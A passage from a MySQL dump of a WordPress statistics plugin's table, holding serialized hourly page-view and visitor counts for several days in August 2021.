8-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"3\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:8:\"visitors\";s:1:\"3\";}}','+01:00'),(9,'hourWiseFirstVisitors','2021-08-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:8:\"visitors\";s:1:\"3\";}}','+01:00'),(10,'hourWisePageViews','2021-08-15 00:00:00','a:18:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:9:\"pageViews\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:9:\"pageViews\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"5\";s:9:\"pageViews\";s:1:\"4\";}i:6;a:2:{s:4:\"hour\";s:1:\"6\";s:9:\"pageViews\";s:1:\"5\";}i:7;a:2:{s:4:\"hour\";s:1:\"8\";s:9:\"pageViews\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"5\";}i:11;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"3\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"3\";}i:15;a:2:{s:4:\"hour\";s:2:\"20\";s:9:\"pageViews\";s:1:\"7\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"1\";}i:17;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"7\";}}','+01:00'),(11,'hourWiseVisitors','2021-08-15 00:00:00','a:18:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"4\";}i:6;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"5\";}i:11;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"3\";}i:15;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:17;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"6\";}}','+01:00'),(12,'hourWiseFirstVisitors','2021-08-15 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"4\";}i:5;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"3\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"5\";}i:9;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:11;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"3\";}i:13;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:14;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"6\";}}','+01:00'),(13,'hourWisePageViews','2021-08-16 00:00:00','a:17:{i:0;a:2:{s:4:\"hour\";s:1:\"3\";s:9:\"pageViews\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"5\";s:9:\"pageViews\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"7\";s:9:\"pageViews\";s:1:\"4\";}i:4;a:2:{s:4:\"hour\";s:1:\"8\";s:9:\"pageViews\";s:1:\"6\";}i:5;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"4\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"4\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"15\";s:9:\"pageViews\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"17\";s:9:\"pageViews\";s:1:\"6\";}i:12;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"19\";s:9:\"pageViews\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"20\";s:9:\"pageViews\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"1\";}i:16;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"2\";}}','+01:00'),(14,'hourWiseVisitors','2021-08-16 00:00:00','a:17:{i:0;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"4\";}i:4;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"3\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"4\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"4\";}i:12;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:16;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(15,'hourWiseFirstVisitors','2021-08-16 00:00:00','a:17:{i:0;a:2:{s:4:\"hour\";s:1:\"3\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"4\";}i:4;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"1\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"4\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"2\";}i:12;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"1\";}i:16;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00');
/*!40000 ALTER TABLE `wp_wsm_dailyHourlyReport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_dailyhourlyreport`
--

DROP TABLE IF EXISTS `wp_wsm_dailyhourlyreport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_dailyhourlyreport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportDate` datetime NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_dailyhourlyreport`
--

LOCK TABLES `wp_wsm_dailyhourlyreport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_dailyhourlyreport` DISABLE KEYS */;
INSERT INTO `wp_wsm_dailyhourlyreport` VALUES (1,'hourWisePageViews','2021-08-12 00:00:00','a:10:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"5\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:9:\"pageViews\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:9:\"pageViews\";s:1:\"7\";}i:4;a:2:{s:4:\"hour\";s:2:\"17\";s:9:\"pageViews\";s:1:\"6\";}i:5;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"3\";}i:6;a:2:{s:4:\"hour\";s:2:\"19\";s:9:\"pageViews\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:2:\"20\";s:9:\"pageViews\";s:1:\"8\";}i:8;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"5\";}i:9;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"2\";}}','+01:00'),(2,'hourWiseVisitors','2021-08-12 00:00:00','a:10:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"3\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"5\";}i:4;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"4\";}i:9;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(3,'hourWiseFirstVisitors','2021-08-12 00:00:00','a:9:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"5\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"3\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"4\";}i:4;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(4,'hourWisePageViews','2021-08-13 00:00:00','a:17:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"4\";}i:3;a:2:{s:4:\"hour\";s:1:\"5\";s:9:\"pageViews\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"6\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"7\";s:9:\"pageViews\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:9:\"pageViews\";s:1:\"6\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"8\";}i:8;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:2:\"15\";}i:9;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"9\";}i:11;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:2:\"16\";}i:12;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"7\";}i:13;a:2:{s:4:\"hour\";s:2:\"15\";s:9:\"pageViews\";s:1:\"2\";}i:14;a:2:{s:4:\"hour\";s:2:\"16\";s:9:\"pageViews\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"1\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"2\";}}','+01:00'),(5,'hourWiseVisitors','2021-08-13 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"2\";}i:5;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:9;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"5\";}i:10;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"4\";}i:11;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:12;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(6,'hourWiseFirstVisitors','2021-08-13 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"1\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"6\";}i:11;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"3\";}i:12;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(7,'hourWisePageViews','2021-08-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"8\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:9:\"pageViews\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:1:\"5\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"3\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:9:\"pageViews\";s:1:\"4\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:9:\"pageViews\";s:1:\"4\";}}','+01:00'),(8,'hourWiseVisitors','2021-08-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"3\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:8:\"visitors\";s:1:\"3\";}}','+01:00'),(9,'hourWiseFirstVisitors','2021-08-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"3\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:8:\"visitors\";s:1:\"3\";}}','+01:00'),(10,'hourWisePageViews','2021-08-15 00:00:00','a:18:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"3\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:9:\"pageViews\";s:1:\"2\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"3\";s:9:\"pageViews\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"5\";s:9:\"pageViews\";s:1:\"4\";}i:6;a:2:{s:4:\"hour\";s:1:\"6\";s:9:\"pageViews\";s:1:\"5\";}i:7;a:2:{s:4:\"hour\";s:1:\"8\";s:9:\"pageViews\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"5\";}i:11;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"3\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"3\";}i:15;a:2:{s:4:\"hour\";s:2:\"20\";s:9:\"pageViews\";s:1:\"7\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"1\";}i:17;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"7\";}}','+01:00'),(11,'hourWiseVisitors','2021-08-15 